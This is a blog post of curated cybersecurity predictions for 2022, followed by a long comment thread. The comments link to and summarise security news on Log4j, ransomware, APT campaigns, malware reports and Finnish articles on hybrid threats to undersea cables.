Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
“Hey Siri, follow that car!”
https://notmyplate.com/whitepaper/
How traffic cameras expose your location through parking apps.
Tomi Engdahl says:
Threat Trends: Vulnerabilities
https://blogs.cisco.com/security/threat-trends-vulnerabilities
It’s shaping up to be another big year for vulnerability disclosure.
Already the number of Common Vulnerabilities and Exposures (CVEs) disclosed has crossed 18, 000 and it’s on track to make this another record-breaking year.
Tomi Engdahl says:
International conflicts driving increased strength of DDoS attacks:
report
https://therecord.media/international-conflicts-driving-increased-strength-of-ddos-attacks-report/
Wars and regional disputes are fueling an increase in powerful distributed denial-of-service (DDoS) attacks, according to a new report from cybersecurity firm NETSCOUT. The company registered increases in the number of DDoS attacks – which flood a targeted website with junk traffic, making them unreachable – for the first half of 2022 in several countries, including Russia, Ukraine, India, Ireland, Finland and others. They tracked more than six million incidents that used 57% more bandwidth than last year. NETSCOUT calculates its figure based on its monitoring of more than 50, 000 autonomous systems in 550 industries across 190 countries. also:
https://www.netscout.com/threatreport
Tomi Engdahl says:
How Underground Groups Use Stolen Identities and Deepfakes https://www.trendmicro.com/en_us/research/22/i/how-underground-groups-use-stolen-identities-and-deepfakes.html
The growing appearance of deepfake attacks is significantly reshaping the threat landscape. These fakes brings attacks such as business email compromise (BEC) and identity verification bypassing to new levels.
Tomi Engdahl says:
Bridge firewalling “bypass” using VLAN 0 https://blog.champtar.fr/VLAN0/
L2 networks are insecure by default, vulnerable to ARP, DHCP, Router Advertisement spoofing to name a few. Over the years security mechanisms have been implemented to detect and or stop those attacks.
As usual when you try to filter anything, you MUST use an allow list approach, else you risk letting some unwanted traffic go through. I was not able to find anything about VLAN 0 attacks, so this might be a novel attack. also: https://blog.champtar.fr/VLAN0_LLC_SNAP/
Tomi Engdahl says:
Researchers Crowdsourcing Effort to Identify Mysterious Metador APT
https://www.securityweek.com/hacktivist-attacks-show-ease-hacking-industrial-control-systems
Tomi Engdahl says:
Researchers Crowdsourcing Effort to Identify Mysterious Metador APT
https://www.securityweek.com/researchers-crowdsourcing-effort-identify-mysterious-metador-apt
Cybersecurity sleuths at SentinelLabs are calling on the wider threat hunting community to help decipher a new mysterious malware campaign hitting telcos, ISPs and universities in the Middle East and Africa.
The never-before-seen threat actor, called Metador, uses sophisticated technical measures to deploy Windows-based malware implants and clever tricks to avoid detection, but despite months of inspecting the code, SentinelLabs researchers say there’s still no clear, reliable sense of attribution.
At the recent LABScon security conference, SentinelLabs malware hunters Juan Andres Guerrero-Saade, Amitai Ben Shushan Ehrlich, and Aleksandar Milenkoski shared technical artifacts associated with Metador and kick-started a crowdsourced effort to better understand the adversary.
“We urge defenders in targeted verticals, regardless of location, to check their telemetry for the possible presence of Metador components and to share samples and indicators with the broader research community,” the SentinelLabs team said.
Tomi Engdahl says:
https://www.securityweek.com/senators-push-reform-polices-cellphone-tracking-tools
Tomi Engdahl says:
Pass-the-Hash Attacks and How to Prevent them in Windows Domains
https://www.bleepingcomputer.com/news/security/pass-the-hash-attacks-and-how-to-prevent-them-in-windows-domains/
Tomi Engdahl says:
You probably don’t need to worry about public WiFi anymore
Here’s what a creep in a coffee shop could actually learn about you
https://www.washingtonpost.com/technology/2022/09/26/public-wifi-privacy/
From uncovered webcams to reused passwords, it’s tough to keep track of how much risk our everyday digital activities actually pose.
Take WiFi networks in airports and coffee shops. They’re part of life for anyone who travels or works remotely. They also have a reputation as cybersecurity risks. Do they still deserve it?
This means even if someone used a public network to spy on you, what they’d discover probably wouldn’t be very valuable, Wisniewski said.
Government employees, dissidents and anyone else dealing with sensitive data can use a trusted virtual private network (VPN) to cloak their activities,
Still, for the rest of us, public WiFi networks aren’t totally threat-free. Mom-and-pop shops are unlikely to keep up with necessary WiFi maintenance such as firmware updates and strong passwords, said Aaron Rinehart, co-founder and chief technology officer at cybersecurity company Verica. A truly committed criminal could impersonate a public network or website to try to steal credentials, he said.
But that’s a lot less likely than someone taking advantage of, say, your reused passwords or outdated software. Focus your energies on cybersecurity chores within your control — such as setting strong passwords, saying “yes” to software updates and learning the signs of a scam — and don’t sweat the public WiFi too hard.
“Generally, using public WiFi is safe so long as your computer is up to date and you encrypt all of your data,” said Eric Rescorla, chief technology officer at Firefox-maker Mozilla.
Tomi Engdahl says:
The Modern Data Stack Through ‘The Gervais Principle’
Data doesn’t move left-to-right in an organization, it moves through Losers, the Clueless, and Sociopaths.
https://medium.com/@laurengreerbalik/the-modern-data-stack-through-the-gervais-principle-bfd4b4e33ac7
Go and Google the term “Modern Data Stack” and search through images. What do you see? It’s one big slew of architecture diagram after architecture diagram, with data flowing throughout various systems from the left to the right in most, much sound and fury signifying nothing other than somewhere between 5 and 100 different vendor solutions to purchase to help move data around.
Fundamentally the left-to-right flow is flawed as it is a dressed up back-of-napkin representation of technology flows, not decision flows or capital allocation flows within organizations.
Ultimately the Modern Data Stack diagram is typically a vendor or VC firm or staff augmentation firm’s view of whatever is most economically beneficial for them at present.
As the firm grows over time through cycles, the Clueless layer becomes so large that it makes the firm unsustainable. Eventually, the Clueless layer takes over and collapses the company as the Sociopaths and Losers both make their exits, as they live closer to reality and can most freely move between organizations.
Tomi Engdahl says:
Hyväuskoisia on helppo höynäyttää: näin tunnistat vaikuttamispyrkimykset
https://www.dna.fi/yrityksille/blogi/-/blogs/hyvauskoisia-on-helppo-hoynayttaa-nain-tunnistat-vaikuttamispyrkimykset?utm_source=facebook&utm_medium=linkad&utm_content=ILTE-artikkeli-hyvauskoisia-on-helppo-hoynayttaa-nain-tunnistat-vaikuttamispyrkimykset&utm_campaign=H_ILTE_MES_22-35-39_artikkelikampanja&fbclid=IwAR23fDj4BIF_Rxf3T5flF_n4YQY_TgZ2AAnwz5EuyJORsQkCR7L95DRtoxY
Hybridivaikuttaminen on puhuttanut suomalaisia ennennäkemättömällä tavalla alkuvuoden ajan. Monia erilaisia keinoja käyttävän vieraan tahon vihamielistä vaikuttamista voi olla vaikea tunnistaa tai huomata. Erityistä huomiota on kiinnitetty erityisesti informaatiovaikuttamisen tunnistamiseen ja kybervaikuttamiseen torjuntaan.
Informaatiovaikuttamisen asiantuntija ja viestintätoimisto Netprofilen perustaja Christina Forsgård on kouluttanut suomalaisia organisaatioita, ammattilaisia ja kansalaisia tunnistamaan vaikuttamispyrkimyksiä. Koulutuksen tavoitteena on auttaa tunnistamaan hybridivaikuttamisen kierouksia ja suojautumaan niiltä.
Tomi Engdahl says:
Nearly 700 ransomware incidents traced back to wholesale access
markets: report
https://therecord.media/nearly-700-ransomware-incidents-traced-back-to-wholesale-access-markets-report/
Researchers have traced almost 700 ransomware incidents back to wholesale access markets (WAM) platforms where people sell access to compromised endpoints, access over various remote protocols such as RDP, and more. Of the 3, 612 attacks in 2021 investigated by analysts from security firm CyberSixgill, 686 involved access to a system logged in to the organization’s domain that had been offered for sale on a WAM within 180 days before the attack. Eighty-five of those cases involved access to an internal machine that had been compromised within 30 days of the attack.
Tomi Engdahl says:
Chaos Is A Go-Based Swiss Army Knife Of Malware https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/?utm_source=rss&utm_medium=rss&utm_campaign=chaos-is-a-go-based-swiss-army-knife-of-malware
Black Lotus Labs, the threat intelligence arm of Lumen Technologies, recently uncovered a multifunctional Go-based malware that was developed for both Windows and Linux, as well as a wide array of software architectures used in devices ranging from small office/home office (SOHO) routers to enterprise servers. Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through stealing and brute forcing SSH private keys, as well as launch DDoS attacks.
Tomi Engdahl says:
Russia waging most sustained and intensive cyber campaign on record, ‘
NCSC CEO says
https://therecord.media/russia-waging-most-sustained-and-intensive-cyber-campaign-on-record-ncsc-ceo-says/
Russia’s physical invasion of Ukraine has been accompanied by “probably the most sustained and intensive cyber campaign on record”
according to one of the United Kingdom’s most senior cybersecurity officials. Despite some of the more extreme warnings from people on the fringes of the cybersecurity sector, those attacks weren’t apocalyptic nor were they intended to be. Russian attacks persistently attempted to reduce the Ukrainian government’s ability to communicate with its population, to interrupt the financial system and spread panic, and to distract Ukraine’s cybersecurity resources from their other priorities.
Tomi Engdahl says:
Securonix Threat Labs Security Advisory: Detecting STEEP#MAVERICK: New Covert Attack Campaign Targeting Military Contractors https://www.securonix.com/blog/detecting-steepmaverick-new-covert-attack-campaign-targeting-military-contractors/
Securonix Threat Research team recently discovered a new covert attack campaign targeting multiple military/weapons contractor companies, including likely a strategic supplier to the F-35 Lightning II fighter aircraft. The stager mostly employed the use of PowerShell and while stagers written in PowerShell are not unique, the procedures involved featured an array of interesting tactics, persistence methodology, counter-forensics and layers upon layers of obfuscation to hide its code. Additionally, the remote infrastructure or command and control
(C2) involved with the stager was relatively sophisticated. We noticed three unique domains leveraging Cloudflare CDN which we will go over a bit more in depth later as to how each plays a role. As we’ll dive into a bit deeper in the next section, spearphishing was the primary means of initial compromise. The attack was carried out starting in late summer 2022 targeting at least two high-profile military contractor companies.
Tomi Engdahl says:
Isku tänne pimentäisi Euroopan internetin – Venäjän liikehdintä on jo herättänyt huolta
Mikäli Venäjä päättäisi sabotoida Eurooppaa, se voisi pimentää maanosan.
https://www.iltalehti.fi/ulkomaat/a/45f82c32-a53d-4090-b7d0-150ba279b294
Miten Venäjä voisi sabotoida Eurooppaa?
Tämä kysymys on noussut jälleen pinnalle alkuviikosta, kun Nord Streamin kaasuputkissa havaittiin yhteensä kolme vuotokohtaa maanantain ja tiistain aikana.
Tanskan ja Ruotsin pääministerit arvioivat kyseessä olevan tahallinen teko, mikä heidän mukaansa viittaa todennäköiseen sabotaasiin.
Seismologisten mittausten mukaan vuotojen aiheuttajana oli räjähdykset, minkä jälkeen moni on epäillyt Venäjän tehneen jonkinlaisen hybridioperaation. Venäjän osuudesta ei kuitenkaan ole tässä vaiheessa näyttöä.
Meren alla ei kulje kuitenkaan ainoastaan kaasuputkia, vaan myös tietoliikenneyhteyksien kannalta kriittisiä merikaapeleita.
Hybridiosaamiskeskuksen verkostojohtaja Jukka Savolainen pitää mahdollisena, että Venäjä niin päättäessään voisi tehdä jonkinlaisen iskun näihin datakaapeleihin, joiden kautta kulkee suuri osa Yhdysvaltain ja Euroopan tietoliikenteestä.
– Kyllä tässä on mahdollisuus. Venäjän tiedustelevaa toimintaa näiden Atlantin kaapeleiden läheisyydessä on jo tarkkailtu huolestuneena, hän sanoo.
Yhdysvallat varoitti Eurooppaa jo kuusi vuotta sitten siitä, että Venäjä on aktivoitunut merikaapeleiden läheisyydessä. Venäjän toiminta etenkin Pohjanmerellä oli Yhdysvaltain tiedusteluyhteisön mukaan liian lähellä kriittisiä kaapeleita.
– Tässä on selvästi hybridisodankäynnin näkökulmasta suuren lamauttavan iskun mahdollisuus, koska huomattava valtaosa kulkee toistaiseksi näissä merikaapeleissa, Savolainen sanoo.
Merikaapeleiden katkaiseminen olisi kova isku Euroopalle. Hieman liioitellen voi sanoa, että internet pimenisi Länsi-Euroopassa.
– Jos Nato ja Yhdysvallat vastaavat sotilaallisesti Venäjän aggressioon Ukrainassa, Atlantin alittavien kaapeleiden katkaiseminen olisi Venäjältä täydellinen vastaisku. Se olisi ”valot pois” Euroopan taloudelta, Irish Timesin haastattelema laivastolähde totesi alkuvuodesta Venäjän laivastoharjoituksen tiimoilta.
Savolainen muistuttaa, että Venäjällä on erityistä kalustoa tämänkaltaisia operaatioita varten, mikäli se haluaisi tällaisen iskun tehdä.
– Niiden avulla Venäjä voisi katkaista kaapeleita usean kilometrin syvyydestä, hän sanoo.
Yksi näistä on Venäjän sotilastiedustelupalvelu GRU:n käytössä oleva Lošarik-ydinsukellusvene, jonka epäillään olevan osa Venäjän huippusalaista merenalaista sodankäyntiä.
Asiantuntijat uskovat, että yksi Lošarikin käyttötarkoituksista on nimenomaan sabotoida merenalaisia tietoliikennekaapeleita.
Tammikuun 7. päivä Norjan mantereen ja Huippuvuorten välisessä tietoliikennekaapelissa ilmeni ongelmia. Ilmeisesti yksi kaapeleista oli katkennut.
– Se ei asettanut Huippuvuoria kuitenkaan täyteen pimentoon, vaan varakaapelit varmistivat tietoliikenteen, Savolainen sanoo.
Norjan viranomaisten mukaan ongelmat aiheutuivat ihmisen toiminnasta, mutta teon tahallisuudesta ei löytynyt merkkejä. Norjassa heräsi joka tapauksessa huoli sabotaasista.
Pitkä lista kohteita
Merellisten kohteiden lisäksi Venäjä voisi iskeä kriittiseen infrastruktuuriin myös maalla, mikäli se haluaisi sabotoida Eurooppaa ja häiritä maanosan toimintaa.
Kyseessä on Savolaisen mukaan valtava kenttä eri kohteita, mikäli jokin valtio haluaisi häiritä eurooppalaisten elämää.
– Siitä aukeaa silloin iso paketti, koska se koskee kaikkea ihan siitä, miten meidän tavarat kulkevat, maksut tapahtuvat ja terveydenhuolto toimii. Tietenkin se koskisi myös esimerkiksi viestiliikennettä ja ruoan- ja energiansaantia, Savolainen luettelee.
– Tässä olisi pitkä messu järjestelmiä, joita voisi sabotoida. Eikä pidä unohtaa teollisia järjestelmiä, kuten tuotantolaitoksia.
Savolaisen mukaan kriittiseen infrastruktuuriin voisi iskeä joko fyysisesti tai kenties todennäköisemmin kyberhyökkäyksellä.
– Kaikki modernit järjestelmät ovat tietokoneohjattuja, ja oman teknisen henkilöstön lisäksi myös taitavat hakkerit pääsevät näihin käsiksi, hän muistuttaa.
Savolainen muistuttaa, että Yhdysvallat on varoittanut Eurooppaa myös Venäjän hakkeritoiminnasta ja siitä, että kriittiseen infrastruktuuriin kohdistuvien hyökkäysten mahdollisuus on olemassa.
Yhdysvallat on muun muassa havainnut Venäjän hakkerien aktiivisuuden kriittisissä tietojärjestelmissä.
– Se voisi tarkoittaa, että siellä luodaan valmiutta siihen, että käskystä nämä järjestelmät kaatuvat, hän sanoo.
Savolaisen mukaan tällaisiin iskuihin ei koskaan voi sataprosenttisesti varautua, mutta Euroopan unioni on kuitenkin suhtautunut asiaan riittävällä vakavuudella.
– EU on toiminut mallikkaasti, koska käsittelyyn on juuri tulossa kaksi tärkeää direktiiviä, hän sanoo.
Savolainen viittaa CER- ja NIS2-direktiiveihin, joilla EU pyrkii parantamaan yhteiskunnan kriittisten palvelujen häiriönsietokykyä ja kyberturvallisuutta. NIS2, eli tarkistettu kyberturvallisuusdirektiivi, korvaa unionin aiemman verkko- ja tietoturvadirektiivin.
– Niissä on tasan tarkkaan mietitty tätä kokonaisuutta, että sieltä on tulossa koko EU:n laajuinen harmonisointi ja yhteistoiminnan järjestäminen, hän sanoo.
– Näillä direktiiveillä EU:n tasoa nostetaan huomattavasti, että täytyy oikein onnitella. Siellä on oltu hereillä ja ehkä jopa riittävän ajoissa.
Savolainen muistuttaa, että suuri osa näistä järjestelmistä on kuitenkin yksityisten yritysten vastuulla. Suojautuminen ei ole siis yksistään viranomaisten asia.
– Turvallisuus syntyy siis yritysten tekniikan ja tietohallinnon tasolla, hän toteaa.
Tomi Engdahl says:
https://hackaday.com/2022/09/28/the-1337-png-hashquine/
